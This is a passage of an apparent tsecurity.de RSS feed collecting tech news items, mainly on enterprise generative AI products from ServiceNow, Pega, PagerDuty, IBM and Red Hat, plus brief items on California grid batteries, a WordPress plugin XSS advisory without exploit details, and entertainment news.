<p><em>September 20, 2023:</em> With the addition of Now Assist to the Vancouver release of its software platform, ServiceNow is <a href="https://www.cio.com/article/652902/servicenow-boasts-industry-first-gen-ai-general-availability-with-vancouver-release-of-now.html">embedding gen AI across the three major workflows it supports</a>. Now Assist for IT Service Management, Customer Service Management, and HR Service Delivery add new text creation and summarization features and an interactive chatbot interface to help workers get to relevant information more quickly.</p>



<h3 class="wp-block-heading">ServiceNow adds new features to its Now Assist generative AI assistant</h3>



<p><em>July 26, 2023:</em> ServiceNow is <a href="https://www.cio.com/article/647355/servicenow-adds-new-features-to-its-now-assist-generative-ai-assistant.html">adding new features to its Now Assist generative AI assistant</a> that comes bundled with the company’s Now platform, designed to help organizations automate workflows. The new capabilities of Now Assist, which include case summarization and text-to-code, are compatible with all workflows and are designed to drive productivity and efficiency for organizations, the company said.</p>



<h3 class="wp-block-heading">ServiceNow offers virtual agent to assist with generative AI</h3>



<p><em>June 13, 2023:</em> ServiceNow is making generative AI accessible from <a href="https://www.cio.com/article/482172/servicenow-offers-virtual-agent-to-assist-with-generative-ai.html">more areas of its low-code development platform</a>, putting it front and center in the chatbots enterprises are starting to use to interact with their ServiceNow applications.</p>



<h3 class="wp-block-heading">ServiceNow, Nvidia to bring generative AI to enterprise workflows</h3>



<p><em>May 17, 2023:</em> ServiceNow and Nvidia are <a href="https://www.cio.com/article/479888/servicenow-nvidia-to-bring-generative-ai-to-enterprise-workflows.html">collaborating to build generative AI applications</a> for various enterprise functions aimed at optimizing business processes and workflows.</p>



<h3 class="wp-block-heading">ServiceNow continues workflow platform expansion with Utah release</h3>



<p><em>March 22, 2023:</em> With its Utah release, ServiceNow is <a href="https://www.cio.com/article/465237/servicenow-continues-workflow-platform-expansion-with-utah-release.html">expanding the reach of its Now Platform</a> for workflow automation into new areas, and enhancing its performance in others.</p>



<h3 class="wp-block-heading">ServiceNow posts Q4 growth as enterprise automation remains strong</h3>



<p><em>January 25, 2023:</em> Enterprise software and workplace management orchestrator ServiceNow announced <a href="https://www.cio.com/article/420069/servicenow-posts-q4-growth-as-enterprise-automation-remains-strong.html">rosy revenue numbers in its Q4 2022 earnings call</a> Wednesday evening, saying that total revenues topped $1.9 billion, which represents a 20% year-on-year increase.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[California's Grid Survives Heat Wave Thanks to Massive Battery Storage]]></title>
<description><![CDATA[Longtime Slashdot reader Uncle_Meataxe shares a report from the Sacramento Bee: California's power grid handled a nearly three week long record-setting heat wave with few issues. The heat wave was the hottest 20-day period on record around Sacramento and set an all-time temperature record of 124 ...]]></description>
<link>https://tsecurity.de/de/2234682/it-security-nachrichten/californias-grid-survives-heat-wave-thanks-to-massive-battery-storage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2234682/it-security-nachrichten/californias-grid-survives-heat-wave-thanks-to-massive-battery-storage/</guid>
<pubDate>Thu, 18 Jul 2024 03:35:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Longtime Slashdot reader Uncle_Meataxe shares a report from the Sacramento Bee: California's power grid handled a nearly three week long record-setting heat wave with few issues. The heat wave was the hottest 20-day period on record around Sacramento and set an all-time temperature record of 124 degrees in Palm Springs. Emergency alerts and calls for voluntary conservation were avoided this time around. Officials credit years of investment in renewable energy, especially battery storage that store solar power for use when the sun stops shining.
 
CAISO last issued calls for voluntary conservation two years ago, during a 2022 bout of extreme heat. Since then, roughly 11,600 megawatts of new renewable energy sources have come onto California's electricity grid. That includes 10,000 megawatts of battery power, enough to power 10 million homes for a few hours. California is now home to the most grid batteries in the world outside of China, [said Elliot Mainzer, president and CEO of California Independent System Operator (CAISO)].
 
"Batteries performed very well in this event, they were charged and ready at the right times for optimization on the grid," he added. "That made a big, big difference." [...] Apart from battery storage, Mainzer also credited that success to less extreme temperatures in Southern California as well as noticeable slightly lower electricity consumption in the peak demand hours, from 4 p.m. to 9 p.m.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=California's+Grid+Survives+Heat+Wave+Thanks+to+Massive+Battery+Storage%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F24%2F07%2F17%2F2353232%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F24%2F07%2F17%2F2353232%2Fcalifornias-grid-survives-heat-wave-thanks-to-massive-battery-storage%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/24/07/17/2353232/californias-grid-survives-heat-wave-thanks-to-massive-battery-storage?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pega GenAI brings more LLMs to low-code automation workflows]]></title>
<description><![CDATA[Pegasystems has announced plans to expand the capabilities of its Pega GenAI enterprise platform by connecting to both Amazon Web Services (AWS) and Google Cloud large language models (LLMs).



By moving beyond Microsoft Azure OpenAI, Pegasystems is broadening the options available to its Pega p...]]></description>
<link>https://tsecurity.de/de/2176514/it-security-nachrichten/pega-genai-brings-more-llms-to-low-code-automation-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2176514/it-security-nachrichten/pega-genai-brings-more-llms-to-low-code-automation-workflows/</guid>
<pubDate>Tue, 11 Jun 2024 21:36:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Pegasystems has announced plans to expand the capabilities of its Pega GenAI enterprise platform by connecting to both Amazon Web Services (AWS) and Google Cloud large language models (LLMs).</p>



<p>By moving beyond Microsoft Azure OpenAI, Pegasystems is broadening the options available to its Pega platform customers for developing AI-based workflow automations. The announcement also underscores the rising importance of generative AI as a must-have functionality in the low-code market.</p>



<p>Arnal Dayaratna, research vice president for software development at IDC, said the move to connect to models hosted by AWS and Google marks a notable step forward in deepening the integration of generative AI capabilities into the company’s platform.</p>



<p>“Pega customers can now seamlessly integrate generative AI capabilities from an expansive universe of foundation models into Pega-related development and use cases,” he said.</p>



<p>The streamlined access to generative AI models, said Dayaratna, is set to “accelerate the development of net-new generative AI applications via the Pega platform. Additionally, the partnerships with AWS and Google Cloud are likely to catalyze the deepened integration of generative AI functionality into existing enterprise applications by means of Pega.”</p>



<p>A release issued by Pega yesterday stated that AWS and Google Cloud generative AI models will be available in Pega Connect GenAI, a plug-and-play architecture that allows low-code developers to author prompts and get immediate value from generative AI in any workflow or decision.</p>



<p>According to the workflow automation provider, this will enable Pega low-code developers to build custom generative AI-powered capabilities into their workflows to help boost the productivity of employees and agents interacting with them.</p>



<p>Pega GenAI, it said, can be used to build a component to summarize documents on the fly and give end-users an at-a-glance overview of critical information when they open their assignments.</p>



<p>Generative AI models from AWS that will be supported include Amazon Bedrock, a managed service that offers a choice of foundation models (FMs) from assorted AI companies, and Amazon Titan, a collection of models designed to support assorted use cases.</p>



<p>On the Google Cloud front, offerings supported include Vertex AI, a machine learning platform; Google Gemini, a generative artificial intelligence chatbot formerly called Bard; and the Google- and Amazon.com-supported Claude from Anthropic, a generative AI model and alternative to OpenAI’s GenAI.</p>



<p>The new services are currently on display at PegaWorld INspire annual conference taking place this week in Las Vegas.</p>



<h2 class="wp-block-heading">The low-code market evolves</h2>



<p>Asked how Pega’s approach matches up with ServiceNow’s Washington DC platform <a href="https://www.cio.com/article/2067653/generative-ai-takes-center-stage-in-latest-servicenow-release.html">launched</a> in March, Bern Elliot, Gartner distinguished VP analyst, said both are good examples of how established application platform vendors are enabling generative AI functionality for their customers.</p>



<p>“Embedding AI tools into applications platforms is a trend that came quite naturally out of generative AI’s strengths and also its weaknesses,” he said, adding that an example of the former is that LLMs are “particularly useful when working with a specific context. The application platform knows the context of the user, the task, and the broader workflow.”</p>



<p>As a result, he said, the “augmentation and automation capabilities can be applied to that very targeted context. One common use case is a targeted, integrated, conversational virtual assistant, sometimes called a copilot.”</p>



<p>As for model choices, Elliot said “different tasks are performed better and worse with different language models. Also, companies may have existing preferences for which language models they prefer. This may be based on performance, pretraining, or cost.”</p>



<p>In addition, he said, integrated trust, risk, and security management (TRISM) is a “critical element of these offers. By including it at the system level, the broader security and governance policies can be applied across the entire work stack and portfolio.”</p>



<p>Meanwhile, following the <a href="https://www.cio.com/article/2067653/generative-ai-takes-center-stage-in-latest-servicenow-release.html">release</a> of ServiceNow’s Washington DC platform, Stephen Elliot, IDC group vice president said one of its most important aspects is the meshing of more robust generative AI support with ServiceNow’s standardized data governance and management systems, which are popular among the company’s larger customers.</p>



<p>“I think this is a key release, because now as customers continue to understand not just the technology behind this, but also the security, the data governance and regional regulations … these are all layers of maturity that are continuing to progress,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PagerDuty seeks to ease incident response with generative AI]]></title>
<description><![CDATA[PagerDuty on Wednesday announced enhancements to its Operations Cloud incident response (IR) platform aimed at accelerating response and remediation when IT issues arise.



The new capabilities include features aimed at analyzing cyber events and interacting with IR teams in conversational Engli...]]></description>
<link>https://tsecurity.de/de/2145344/it-security-nachrichten/pagerduty-seeks-to-ease-incident-response-with-generative-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2145344/it-security-nachrichten/pagerduty-seeks-to-ease-incident-response-with-generative-ai/</guid>
<pubDate>Sun, 12 May 2024 16:56:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>PagerDuty on Wednesday announced enhancements to its Operations Cloud incident response (IR) platform aimed at accelerating response and remediation when IT issues arise.</p>



<p>The new capabilities include features aimed at analyzing cyber events and interacting with IR teams in conversational English in real-time.</p>



<p>“We typically see time to acknowledge [an incident] at about 45 minutes to an hour. We can now bring that down to just two or three minutes,” said Jonathan Rende, senior VP for products at PagerDuty, in an interview with CIO.com. “And it’s not just about responding, but it’s about fixing it. That can be multiple hours and even days. We’re taking it down to sub one-hour.”</p>



<p>Some of the new capabilities exist within the company’s PagerDuty Copilot offering, such as having an automated function to summarize post-incident reviews. The copilot, which is invoked via Slack, was first announced in December 2023.</p>



<p>“By interpreting the results of automated diagnostics, providing responders with helpful incident context, drafting status updates, and generating drafts of post-incident reviews with the click of a button, PagerDuty Copilot allows teams to eliminate time-consuming and repetitive tasks so they can focus on high-priority needs,” the company wrote <a href="https://www.pagerduty.com/blog/new-innovations-pagerduty-operations-cloud-may-2024" rel="nofollow">in a press release</a>. “If the user asks PagerDuty Copilot to generate a post-incident review, it can generate a draft in seconds — reduced from the hours it typically takes.”</p>



<p>In addition to post-incident review, PagerDuty Copilot includes a low-code feature for generating workflow definitions and prompts, an automation digest for summarizing highlights from automated tasks, and the ability to build a narrative timeline of an incident, which requires PagerDuty’s Enterprise Incident Management or Jeli products and is in early beta.</p>



<p>Rende said that one of the better additions is PageDuty Copilot’s enablement of natural conversation interactions. He gave an example of a large retailer experiencing an unexpected shutdown of all shopping carts. </p>



<p>IR managers “could create a virtual war room via a Slack channel. Someone could ask, ‘What just changed?’” and PagerDuty Copilot would list all system changes, with a focus on the elements that it thinks are most likely the cause, Rende said. </p>



<p>One IT challenge today is a lack of full visibility into global environments. Large cloud environments provide an example of this, as do SaaS platforms and third-party partner systems in IT supply chains. Although Rende said that PagerDuty does not have visibility into systems IT cannot access, it’s generative AI systems could extrapolate from what it <em>can </em>see to analyze and potentially suggest the third-party platform that is likely responsible — by ruling out everything else. </p>



<p>Stephen Elliot, an IDC group vice president who tracks cloud and DevOps, saw much to like in the announcement. Asked about how an enterprise would fare differently from using these new capabilities and doing it themselves with their existing AI-based automation, Elliot pointed to consolidation.</p>



<p>“The difference is that this is from a single platform/technology and not a set of separate best-of-breed tools that do AIOps, automation, root causes, etc., separately. Automation is part of the platform,” Elliot said. “The data is collected onto the platform and the genAI applied to it. They have a large customer base so, for many tech shops with generalists, this might make sense.”</p>



<p>The PagerDuty Operations Console is currently in Early Access and will be generally available in Q3 2024, the company said. Workflow Automation is generally available. Runbook Automation’s project-based runner management is currently in Early Access and will be generally available in Q3 2024. PagerDuty Copilot is currently in Early Access and will be generally available in Q3 2024. The enterprise plan for PagerDuty Incident Management, including Jeli Post-Incident Reviews, is generally available.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM showcases Gen AI-driven Concert to monitor and manage enterprise applications]]></title>
<description><![CDATA[IBM has showcased its new generative AI-driven Concert offering that is designed to help enterprises monitor and manage their applications.



Showcased at the ongoing annual Think conference, IBM Concert will be generally available in June and is underpinned by the watsonx platform. It will serv...]]></description>
<link>https://tsecurity.de/de/2142466/it-security-nachrichten/ibm-showcases-gen-ai-driven-concert-to-monitor-and-manage-enterprise-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2142466/it-security-nachrichten/ibm-showcases-gen-ai-driven-concert-to-monitor-and-manage-enterprise-applications/</guid>
<pubDate>Sat, 11 May 2024 05:44:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM has showcased its new <a href="https://www.infoworld.com/article/3689973/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a>-driven Concert offering that is designed to help enterprises monitor and manage their applications.</p>



<p>Showcased at the ongoing annual Think conference, IBM Concert will be generally available in June and is underpinned by the <a href="https://www.infoworld.com/article/3695951/ibm-takes-on-aws-google-and-microsoft-with-watsonx.html">watsonx platform</a>. It will serve as the “nerve center” of an enterprise’s IT operation, the company said, adding that the offering will generate insights across an enterprise’s folio of applications to help reduce risk and compliance processes.</p>



<p>The new tool integrates into an enterprise’s existing systems using generative AI to connect with data from their cloud infrastructure, source repositories, <a href="https://www.infoworld.com/article/3271126/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html#:~:text=CI%2FCD%20defined,-Continuous%20integration%20is&amp;text=Continuous%20integration%20establishes%20an%20automated,better%20collaboration%20and%20code%20quality.">CI/CD pipelines</a> and other existing <a href="https://www.infoworld.com/article/3608249/observability-what-it-should-know-as-the-technology-heats-up.html">observability</a> offerings to build out a 360-degree view of their connected applications, Bill Lobig, vice president of product management at IBM Automation said in a <a href="https://newsroom.ibm.com/Blog-Introducing-IBM-Concert-Control-your-operations-with-generative-AI-insights" rel="nofollow">blog post</a>.</p>



<p>This all-round view, which has been christened IBM Concert 360 view, contains a single unified view of an enterprise’s applications along with their dependencies, information about risks around applications, and a view of common flows between applications.</p>



<p>The Concert offering focuses on dependency mapping across an increasingly broad set of data sources (or entities) to enable developers, <a href="https://www.infoworld.com/article/3537551/what-is-an-sre-the-vital-role-of-the-site-reliability-engineer.html">site reliability engineers (SREs)</a>, and operations to better understand potential problems at the application layer, according to IDC Research Vice President Stephen Elliot. </p>



<p>“As more IT executives need teams to find issues spanning security, code, and operational domains, the ability to understand dependencies across these vast data lakes is becoming mission critical,” Elliot explained.</p>



<p>Further, the research vice president said that IBM Concert can be compared with observability offerings from vendors, such as <a href="https://www.infoworld.com/article/2629570/dynatrace-adds-virtualization-and-soa-capabilities-to-its-app-performance-manager.html">Dynatrace</a>, Cisco AppD, <a href="https://www.infoworld.com/article/3702721/splunks-new-ai-tools-aim-to-ease-security-observability-tasks.html">Splunk</a> Observability Platform, and <a href="https://www.infoworld.com/article/3645501/new-relic-expands-enterprise-full-stack-observability-to-include-mlops.html">New Relic</a>. </p>



<p>Amalgam Insight’s chief analyst Hyoun Park, on the other hand, thinks that IBM Concert superficially has traits that are common with <a href="https://www.infoworld.com/article/3652615/how-to-evaluate-software-asset-management-tools.html">IT asset management offerings</a>. However, the chief analyst also pointed out that the level of governance provided by Concert makes it more akin to a control pane for maintaining an optimal usage, support, and compliance environment for every application. </p>



<p>IBM claims that Concert will initially focus on helping enterprises with use cases around security risk management, application compliance management, and certificate management.</p>



<p>Additional risk use cases are planned to be introduced over time, as well as other focus areas like cost, observability, security, and networking among others, Lobig said. IBM has not clarified how an enterprise can subscribe to the offering and how to access it. However, it is providing a page to sign up for the offering as part of a <a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-52794" rel="nofollow">waitlist program</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Red Hat introduces ‘policy as code’ for Ansible]]></title>
<description><![CDATA[Red Hat Ansible’s new “policy as code” capabilities will help users of the infrastructure automation platform to increase efficiency, reduce human error and improve the ability to meet governance, compliance, security and cost objectives, the company announced this morning at the Red Hat Summit i...]]></description>
<link>https://tsecurity.de/de/2123663/it-security-nachrichten/red-hat-introduces-policy-as-code-for-ansible/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2123663/it-security-nachrichten/red-hat-introduces-policy-as-code-for-ansible/</guid>
<pubDate>Fri, 26 Apr 2024 04:46:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Red Hat Ansible’s new “policy as code” capabilities will help users of the infrastructure automation platform to increase efficiency, reduce human error and improve the ability to meet governance, compliance, security and cost objectives, the company announced this morning at the Red Hat Summit in Denver. And it will help position Red Hat for an increasingly AI-dominated future.</p>



<p>The new capability, a tech preview of which is slated for availability “in the coming months,” will help enforce policies and compliance across hybrid cloud estates that increasingly include a varied and growing number of AI applications, the company announced. It enables <a href="https://www.networkworld.com/article/2075207/network-automation-challenges-are-dampening-success-rates.html">high-level strategies for automation maturity</a> “to better prepare organizations for sprawling infrastructure in support of scaling AI workloads,” Red Hat says.</p>



<p>The problem, says Sathish Balakrishnan, vice president and general manager for Red Hat’s Ansible business unit, is that as AI scales the capabilities of individual systems beyond what humans can manage, the challenge of maintaining IT infrastructure grows exponentially.</p>



<p>And even before infrastructure is focused on AI workloads and services, mission critical systems are still impacted by compliance mandates for security, performance, and auditability, he says. Even today, implementing these policies requires time, attention, and cross-functional team collaboration and documentation. “Mistakes can be costly,” he adds.</p>



<p>According to Balakrishnan, the enterprises who will benefit the most from the new capability are those looking to take advantage of AI. “In many ways, AI is the final stage of the automation adoption journey,” he says. “In the context of enterprise IT ops, AI means machines automating processes, machines connecting infrastructure and tools to make them more efficient, and machines making decisions to improve resiliency and reduce costs.”</p>



<p>That’s a shift in how IT ops is conducted, he says, and nearly every tool or platform in the environment is already introducing new AI capabilities. “This will provide you with vast new amounts of data, insights and intelligence,” he says. “But to make it all actionable, you need to be able to orchestrate it all – and you need to be able to harness the new intelligence to optimize your stack.”</p>



<p>So, for any organization looking to leverage AI, automation is mission-critical, he says.</p>



<p>Say, for example, a company is using the AI-powered Ansible Lightspeed service to accelerate automation development. If “policy as code” is infused from the start, content creators can write code that automatically maintains mandated compliance requirements, he says, “greatly reducing the impact of skills gaps and human error in IT operations.”</p>



<p>At British banking and insurance company NatWest Group, for example, adding policy capability to automation will allow for increased compliance and adherence to regulations, says Baljinder Kang, the company’s director of enterprise engineering, in a statement. “We think this is necessary as we look to add AI capabilities to continue to enhance our tooling to drive increased value in our solutions to meet our customer needs,” he says.</p>



<p>The big public clouds – hyperscalers like AWS, Microsoft Azure, and Google Cloud Platform – are also moving in the direction of policy as code, says IDC analyst Stephen Elliot.</p>



<p>“They have lots of point tools,” Elliot says. “Typically, customers tell us that they have Cloud Watch, they have CloudTrail, they have AWS Systems Manager. The tools are either free or almost free. They’re good enough, cheap enough. They need them for visibility into the AWS environment.”</p>



<p>But once enterprises move outside of a particular cloud, they need to use other tools, such as Ansible or Terraform. “Red Hat is all about supporting all the clouds,” Elliot says. “Ansible is all about automating things across all the clouds — part of the value is multi-cloud support. Most of the public cloud providers only care about their own cloud, and for very good reasons.”</p>



<p>However, enterprises are still far from being able to rely fully on automation for policy enforcement, he says. With AI-powered automation, in particular, “the hype is way ahead of what we’re capable of,” Elliot says. “There’s a lot of experimentation this year, and there’s a lot of money put into these AI experiments and AI use cases, but this is going to take a little time.”</p>



<p>Still, companies should be looking at this now, he says. “You’ve got to start somewhere,” he says. “You have to think about how you would define a use case for policy as code.”</p>



<p>With Red Hat Ansible, there are so many users and companies using this that many companies will be able to figure out how to drive some efficiencies and cost improvements.</p>



<p>“Speed is the ultimate competitive weapon,” Elliot says. “If you’re not talking about it, you’re already losing. And if you are talking about it, make some decisions about your investments.”</p>
</div></div></div><category>Linux, Network Management Software</category></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Red Hat extends Lightspeed generative AI tool to OpenShift and Enterprise Linux]]></title>
<description><![CDATA[Red Hat’s generative AI-powered Lightspeed tool was first announced last year for the Red Hat Ansible automation platform. This morning, as the Red Hat Summit kicks off in Denver, the company announced that it will be extended to Red Hat Enterprise Linux and Red Hat OpenShift.



OpenShift, Red H...]]></description>
<link>https://tsecurity.de/de/2123662/it-security-nachrichten/red-hat-extends-lightspeed-generative-ai-tool-to-openshift-and-enterprise-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2123662/it-security-nachrichten/red-hat-extends-lightspeed-generative-ai-tool-to-openshift-and-enterprise-linux/</guid>
<pubDate>Fri, 26 Apr 2024 04:46:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Red Hat’s generative AI-powered Lightspeed tool was first announced last year for the Red Hat Ansible <a href="https://www.networkworld.com/article/971159/10-top-automation-and-orchestration-tools.html">automation platform</a>. This morning, as the Red Hat Summit kicks off in Denver, the company announced that it will be extended to Red Hat Enterprise Linux and Red Hat OpenShift.</p>



<p>OpenShift, Red Hat’s Kubernetes-powered hybrid cloud application platform, will be getting it late this year. Red Hat Enterprise Linux Lightspeed is now in its planning phase, with more information coming soon.</p>



<p>“This will bring similar genAI capabilities to both of those platforms across the hybrid cloud,” says Chuck Dubuque, senior director for product marketing at Red Hat OpenShift. Users will be able to ask questions in simple English and get usable code as a result, or suggestions for specific actions, he says, and the tool is designed to address skills gaps and the increasing complexities in enterprise IT.</p>



<p>“More seasoned IT pros can use Red Hat Lightspeed to extend their skills by using Red Hat Lightspeed as a force multiplier,” Dubuque says. “It can help quickly generate potential answers to niche questions or handle otherwise tedious tasks at scale. It helps IT organizations innovate and build a stronger skilled core while helping further drive innovation.”</p>



<p>The vision is that Red Hat Linux will help companies <a href="https://www.networkworld.com/article/2075207/network-automation-challenges-are-dampening-success-rates.html">address this skills gap</a> and put more power in the hands of organizations who want to use Linux, automation, and hybrid clouds but don’t have the skills in house, he says, “or endless funds to enlist said skills.”</p>



<p>Other generative AI platforms can also answer questions and write code, but those are general-purpose LLMs, he says. “We built a purpose-driven model to solve unique challenges for IT,” he says. “The skill sets required for programming and development haven’t always been widely accessible to the entire talent pool or businesses with limited resources.”</p>



<p>Red Hat didn’t create the core foundation model, however.</p>



<p>Take, for example, Ansible Lightspeed, which became generally available last November. Ansible Lightspeed is based on IBM’s WatsonX Code Assistant, which, in turn, is powered by the IBM Granite foundation models, according to Sathish Balakrishnan, vice president and general manager at the Red Hat Ansible Business Unit,</p>



<p>It is then further trained on data from Ansible Galaxy, an open-source repository of Ansible content covering a variety of use cases, he says, and further fine-tuned with additional expertise from <a href="https://www.networkworld.com/article/2097006/ibms-bets-on-ai-and-hybrid-cloud-pay-off.html">Red Hat and IBM</a>.</p>



<p>For example, to create and edit an Ansible Playbook and rules, users can type in a question and get an output that’s translated into YAML content. That streamlines role and playbook creation, Balakrishnan says. This helps companies translate subject matter expertise into best practices that can scale across teams, standardize and improve quality, and adhere to industry standards.</p>



<p>“The service also helps safeguard private data through data isolation, so sensitive customer information remains untouched and possible data leaks are minimized,” he says.</p>



<p>Hundreds of customers are already using Lightspeed Ansible to generate tasks, says Dubuque. “And we’re expanding it to build full playbooks,” he says. “But Red Hat Lightspeed is bigger than just Ansible. We’re infusing generative AI into all our platforms.”</p>



<p>So, for example, with OpenShift Lightspeed, users will have an assistant integrated right into the OpenShift console so they can ask questions in plain English about the product or get help with troubleshooting. “Our goal is to increase productivity and efficiency,” he says.</p>



<p>However, we’re still in the early days of generative AI and AI assistants, says IDC analyst Stephen Elliot, so companies do need to be careful about how they use the technology. “But it’s a safe assumption that most of these models are going to get better and smarter,” Elliot says.</p>
</div></div></div><category>Linux, Network Management Software, Networking, Servers</category></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-29125 | Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross site scripting.

This vulnerability is uniquely identified as CVE-2024-29125. It is possible to ini...]]></description>
<link>https://tsecurity.de/de/2116388/sicherheitsluecken/cve-2024-29125-elliot-sowersby-coupon-affiliates-plugin-up-to-5127-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2116388/sicherheitsluecken/cve-2024-29125-elliot-sowersby-coupon-affiliates-plugin-up-to-5127-on-wordpress-cross-site-scripting/</guid>
<pubDate>Sat, 20 Apr 2024 10:28:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.elliot_sowersby:coupon_affiliates_plugin">Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7</a> on WordPress. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This affects an unknown part. The manipulation leads to cross site scripting.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.257307">CVE-2024-29125</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Darkness Outside Us: Elliot Page spielt die Hauptrolle in neuem Sci-Fi-Film]]></title>
<description><![CDATA[Elliot Page produziert die Verfilmung eines Young-Adult-Sci-Fi-Romans - und will auch eine der Hauptrollen spielen. (Science-Fiction, Film)]]></description>
<link>https://tsecurity.de/de/2102446/it-nachrichten/the-darkness-outside-us-elliot-page-spielt-die-hauptrolle-in-neuem-sci-fi-film/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2102446/it-nachrichten/the-darkness-outside-us-elliot-page-spielt-die-hauptrolle-in-neuem-sci-fi-film/</guid>
<pubDate>Tue, 09 Apr 2024 20:02:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Page produziert die Verfilmung eines Young-Adult-Sci-Fi-Romans - und will auch eine der Hauptrollen spielen. (<a href="https://www.golem.de/specials/science-fiction/">Science-Fiction</a>, <a href="https://www.golem.de/specials/film/">Film</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=184397&amp;page=1&amp;ts=1713786302" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Euphoria Staffel 3: Alle Infos zu Release, Handlung, Besetzung und mehr]]></title>
<description><![CDATA[Sam Levinson, der Schöpfer der Drama-Serie “Euphoria”, will sich offenbar mehr Zeit für das Drehbuch von Staffel 3 nehmen als erwartet. Bislang waren Fans davon ausgegangen, dass die Dreharbeiten zur neuen Staffel in Kürze beginnen. Nun wurde jedoch bekannt, dass sich der Produktionsstart weiter ...]]></description>
<link>https://tsecurity.de/de/2070234/it-nachrichten/euphoria-staffel-3-alle-infos-zu-release-handlung-besetzung-und-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2070234/it-nachrichten/euphoria-staffel-3-alle-infos-zu-release-handlung-besetzung-und-mehr/</guid>
<pubDate>Thu, 14 Mar 2024 01:26:50 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Sam Levinson, der Schöpfer der Drama-Serie “Euphoria”, will sich offenbar mehr Zeit für das Drehbuch von Staffel 3 nehmen als erwartet. Bislang waren Fans davon ausgegangen, dass die Dreharbeiten zur neuen Staffel in Kürze beginnen. Nun wurde jedoch bekannt, dass sich der Produktionsstart weiter verzögern wird. </p>



